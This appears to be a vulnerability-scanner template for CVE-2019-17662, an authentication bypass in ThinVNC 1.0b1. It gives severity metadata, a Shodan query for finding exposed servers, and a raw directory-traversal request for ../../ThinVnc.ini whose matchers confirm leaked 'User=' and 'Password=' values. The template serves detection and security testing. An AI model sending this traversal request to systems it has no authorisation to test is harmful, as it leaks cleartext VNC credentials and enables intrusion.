id: CVE-2019-17662 info: name: ThinVNC 1.0b1 - Authentication Bypass author: DhiyaneshDK severity: critical description: | ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector. impact: | An attacker can bypass authentication and gain unauthorized access to the ThinVNC application. remediation: | Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms. reference: - http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html - https://github.com/bewest/thinvnc/issues/5 - https://redteamzone.com/ThinVNC/ - https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py - https://github.com/YIXINSHUWU/Penetration_Testing_POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2019-17662 cwe-id: CWE-22 epss-score: 0.64941 epss-percentile: 0.97813 cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: cybelsoft product: thinvnc shodan-query: http.favicon.hash:-1414548363 tags: cve,cve2019,packetstorm,auth-bypass,thinvnc,intrusive,cybelsoft http: - raw: - | GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "User=" - "Password=" condition: and - type: word part: header words: - "application/binary" - type: status status: - 200 # digest: 4a0a0047304502202fb82bfb26b97edcb70f493b3640966574b012e563f89c2cdf77953916740bd2022100c643b657ac203096fd96e6dd9cd4a8942c4db7a202addc62e1a0390d913b83e7:922c64590222798bb761d5b6d8e72950